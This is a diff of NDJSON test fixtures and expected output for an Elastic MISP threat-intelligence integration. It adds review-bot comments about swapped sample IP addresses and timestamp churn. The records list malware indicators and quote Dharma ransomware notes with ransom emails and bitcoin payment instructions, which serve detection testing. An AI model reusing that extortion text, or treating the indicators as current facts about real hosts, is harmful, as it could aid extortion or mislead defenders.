Gdata","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"1","timestamp":"1498163317","uuid":"54bf5a6f-ac50-4f71-9cd3-7080950d210b"}},{"Event":{"Org":{"id":"1","name":"ORGNAME","uuid":"982f7c55-684d-4eb9-8736-fb5f668b899d"},"Orgc":{"id":"4","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f"},"analysis":"2","date":"2014-11-20","distribution":"3","id":"621","info":"Turla digging using 
TotalHash","org_id":"1","orgc_id":"4","published":true,"threat_level_id":"2","timestamp":"1498163604","uuid":"546daad5-425c-4ac4-82c7-e07f950d210b"}}],"ShadowAttribute":[],"Tag":[{"colour":"#065100","exportable":true,"hide_tag":false,"id":"22","local":0,"name":"misp-galaxy:tool=\"Turla\"","numerical_value":null,"user_id":"0"},{"colour":"#ffffff","exportable":true,"hide_tag":false,"id":"2","local":0,"name":"tlp:white","numerical_value":null,"user_id":"0"}],"analysis":"2","attribute_count":"100","date":"2017-03-30","disable_correlation":false,"distribution":"3","extends_uuid":"","id":"4","info":"OSINT - Carbon Paper: Peering into Turla’s second stage backdoor","locked":false,"org_id":"1","orgc_id":"2","proposal_email_lock":false,"publish_timestamp":"1603226330","published":true,"sharing_group_id":"0","threat_level_id":"3","timestamp":"1493403824","uuid":"58dcfe62-ed84-4e5e-b293-4991950d210f"}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1077","type":"sha256","category":"External 
analysis","to_ids":true,"uuid":"54324042-49fc-4628-a95e-44da950d210b","event_id":"2","distribution":"5","timestamp":"1412579394","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0a1103bc90725d4665b932f88e81d39eafa5823b0de3ab146e2d4548b7da79a0","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} -{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1084","type":"ip-dst","category":"Network 
activity","to_ids":true,"uuid":"54324081-3308-4f1f-8674-4953950d210b","event_id":"2","distribution":"5","timestamp":"1412579457","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"223.25.233.248","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1084","type":"ip-dst","category":"Network 
activity","to_ids":true,"uuid":"54324081-3308-4f1f-8674-4953950d210b","event_id":"2","distribution":"5","timestamp":"1412579457","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"89.160.20.156","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1086","type":"hostname","category":"Network 
activity","to_ids":true,"uuid":"543240dc-f068-437a-baa9-48f2950d210b","event_id":"2","distribution":"5","timestamp":"1412579548","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"xenserver.ddns.net","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1089","type":"text","category":"External 
analysis","to_ids":false,"uuid":"543240f9-64e8-41f2-958f-4e21950d210b","event_id":"2","distribution":"5","timestamp":"1412579577","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"Nitro","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"2","orgc_id":"2","org_id":"1","date":"2014-10-03","threat_level_id":"2","info":"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks","published":true,"uuid":"54323f2c-e50c-4268-896c-4867950d210b","attribute_count":"29","analysis":"2","timestamp":"1412579577","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610622316","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"2","name":"CthulhuSPRL.be","uuid":"55f6ea5f-fd34-43b8-ac1d-40cb950d210f","local":false},"Attribute":{"id":"1090","type":"sha1","category":"External analysis","to_ids":true,"uuid":"56c625a7-f31c-460c-9ea1-c652950d210f","event_id":"2","distribution":"5","timestamp":"1455826343","comment":"Automatically added (via 
7915aabb2e66ff14841e4ef0fbff7486)","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"0ea76f1586c008932d90c991dfdd5042f3aac8ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"1","name":"type:OSINT","colour":"#004646","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"2","name":"tlp:green","colour":"#339900","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} 
@@ -12,4 +12,4 @@ {"Event":{"id":"158","orgc_id":"5","org_id":"1","date":"2018-01-08","threat_level_id":"1","info":"Turla: Mosquito Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17322","type":"filename|sha1","category":"Artifacts dropped","to_ids":false,"uuid":"5a539ce1-e6a0-426a-942c-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515429089","comment":"JavaScript backdoor","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla 
Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12268","type":"email-src","category":"Payload delivery","to_ids":true,"uuid":"56ccdcb6-4d6c-4e48-b955-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266422","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"claudiobonadio88@gmail.com","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} {"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat 
Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12298","type":"regkey","category":"Artifacts dropped","to_ids":true,"uuid":"56ccdcd6-f4b8-4383-9624-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266454","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"HKLM\\SOFTWARE\\Microsoft\\Active","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} -{"Event":{"id":"10","orgc_id":"4","org_id":"1","date":"2020-12-09","threat_level_id":"3","info":"Recent Qakbot (Qbot) activity","published":true,"uuid":"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16","attribute_count":"15","analysis":"2","timestamp":"1607868196","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637888","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"10686","type":"ip-dst|port","category":"Network activity","to_ids":true,"uuid":"5fd0c620-a844-4ace-9710-a37bc0a8ab16","event_id":"10","distribution":"5","timestamp":"1607517728","comment":"On port 
2222","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"62.38.114.12|2222","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"6","name":"misp-galaxy:banker=\"Qakbot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"10","orgc_id":"4","org_id":"1","date":"2020-12-09","threat_level_id":"3","info":"Recent Qakbot (Qbot) activity","published":true,"uuid":"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16","attribute_count":"15","analysis":"2","timestamp":"1607868196","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637888","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"10686","type":"ip-dst|port","category":"Network activity","to_ids":true,"uuid":"5fd0c620-a844-4ace-9710-a37bc0a8ab16","event_id":"10","distribution":"5","timestamp":"1607517728","comment":"On port 
2222","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"89.160.20.156|2222","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"6","name":"misp-galaxy:banker=\"Qakbot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0}]}} diff --git a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json index 556a3e11729..5157a4cbe94 100644 --- a/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json +++ b/packages/ti_misp/data_stream/threat/_dev/test/pipeline/test-misp-sample-ndjson.log-expected.json 
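Review bot: The `ip-dst|port` record now carries `89.160.20.156|2222`, the same address the `ip-dst` record above and the `domain|ip` record in the expected-output file were changed to, so a failing pipeline test can no longer be traced back to a specific sample record by its address; if the supported subset offers a second address, using it for one of the three records would keep the samples distinguishable. The split of `89.160.20.156|2222` into separate ip and port fields must also be reflected in the regenerated expected output; only the `domain|ip` record's updated expectation is visible in this diff, so confirm the `ip-dst|port` entry was regenerated as well. The fixture is NDJSON with no comment syntax, so the constraint this change enforces (sample addresses must come from the supported subset) is worth recording once in the data stream's test config or the package README for the next contributor who adds a sample.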
@@ -65,7 +65,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046311343Z", + "ingested": "2021-12-09T13:49:05.849316800Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"Payload delivery\",\"comment\":\"- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"5\",\"first_seen\":null,\"id\":\"351\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1503930272\",\"to_ids\":true,\"type\":\"md5\",\"uuid\":\"59a427a0-f6f8-4178-9e7d-dfd702de0b81\",\"value\":\"f2679bdabe46e10edc6352fff3c829bc\"},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"http://pastebin.com/raw/GHgpWjar\",\"MISP Project\"],\"collection_uuid\":\"10cf658b-5d32-4c4b-bb32-61760a640372\",\"description\":\"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\\\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. 
CrySiS variant\",\"galaxy_id\":\"43\",\"id\":\"6619\",\"local\":false,\"meta\":{\"date\":[\"November 2016\"],\"encryption\":[\"AES + RSA-512\"],\"extensions\":[\".dharma\",\".wallet\",\".zzzzz\",\".cmb\",\".id-BCBEF350.[paymentbtc@firemail.cc].cmb\",\".bip\",\".id-BCBEF350.[Beamsell@qq.com].bip\",\".boost\",\".[Darknes@420blaze.it].waifu\",\".brrr\",\".adobe\",\".tron\",\".AUDIT\",\".cccmn\",\".fire\",\".myjob\",\".[cyberwars@qq.com].war\",\".risk\",\".RISK\",\".bkpx\",\".[newsantaclaus@aol.com].santa\"],\"payment-method\":[\"Bitcoin - Email\"],\"ransomnotes\":[\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email paymentbtc@firemail.cc\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\\\nWrite this ID in the title of your message ACBFF130\\\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. 
You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\\\nhttps://localbitcoins.com/buy_bitcoins\\\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\\\nAttention!\\\\nDo not rename encrypted files.\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\\\nWrite this ID in the title of your message BCBEF350\\\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\\\nhttps://localbitcoins.com/buy_bitcoins \\\\nAlso you can find other places to buy Bitcoins and beginners guide here: \\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\\\nAttention!\\\\nDo not rename encrypted files. 
\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email Beamsell@qq.com\"],\"ransomnotes-filenames\":[\"README.txt\",\"README.jpg\",\"Info.hta\",\"FILES ENCRYPTED.txt\",\"INFO.hta\"],\"ransomnotes-refs\":[\"https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg\",\"https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg\",\"https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg\",\"https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg\",\"https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg\"],\"refs\":[\"https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html\",\"https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/\",\"https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/\",\"https://twitter.com/demonslay335/status/1049313390097813504\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/\",\"https://twitter.com/JakubKroustek/status/1038680437508501504\",\"https://twitter.com/demonslay335/status/1059521042383814657\",\"https://twitter.com/demonslay335/status/1059940414147489792\",\"https://twitter.com/JakubKroustek/status/1060825783197933568\",\"https://twitter.com/JakubKroustek/status/1064061275863425025\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/\",\"https://www.youtube.com/watch?v=qjoYtwLx2TI\",\"https://twitter.com/GrujaRS/status/1072139616910757888\
"]},\"source\":\"Various\",\"tag_id\":\"23\",\"tag_name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"type\":\"ransomware\",\"uuid\":\"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b\",\"value\":\"Dharma Ransomware\",\"version\":\"86\"}],\"description\":\"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"icon\":\"btc\",\"id\":\"43\",\"name\":\"Ransomware\",\"namespace\":\"misp\",\"type\":\"ransomware\",\"uuid\":\"3f44af2e-1480-4b6b-9aa8-f9bb21341078\",\"version\":\"4\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#0088cc\",\"exportable\":true,\"hide_tag\":false,\"id\":\"23\",\"local\":0,\"name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#004646\",\"exportable\":true,\"hide_tag\":false,\"id\":\"21\",\"local\":0,\"name\":\"type:OSINT\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#2c4f00\",\"exportable\":true,\"hide_tag\":false,\"id\":\"24\",\"local\":0,\"name\":\"malware_classification:malware-category=\\\"Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#00223b\",\"exportable\":true,\"hide_tag\":false,\"id\":\"3\",\"local\":0,\"name\":\"osint:source-type=\\\"blog - post\\\"\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"7\",\"date\":\"2017-08-25\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"5\",\"info\":\"OSINT - New Arena Crysis Ransomware Variant 
Released\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226331\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1503930276\",\"uuid\":\"59a3d08d-5dc8-4153-bc7c-456d950d210f\"}}", "category": "threat", "type": "indicator", @@ -135,7 +135,7 @@ "url": { "domain": "your-ip.getmyip.com" }, - "ip": "178.128.103.74", + "ip": "89.160.20.156", "scanner_stats": 2 }, "feed": { 
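Review bot: `event.ingested` is a wall-clock value stamped by the ingest node, so the `-`/`+` pair at the top of this hunk is churn that will recur every time the expected file is regenerated; the same pair appears again in the `@@ -143,8 +143,8 @@` hunk below, which runs past this view. If the data stream's pipeline test config does not already declare it, mark the field dynamic — `dynamic_fields:` followed by `  event.ingested: ".*"` — so the expected output only pins fields the pipeline actually controls and a fixture-only change like this one does not touch timestamps. The `event.original` context line carried here is unchanged and is the deterministic part of the record, which is what the expectation should be anchored on.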
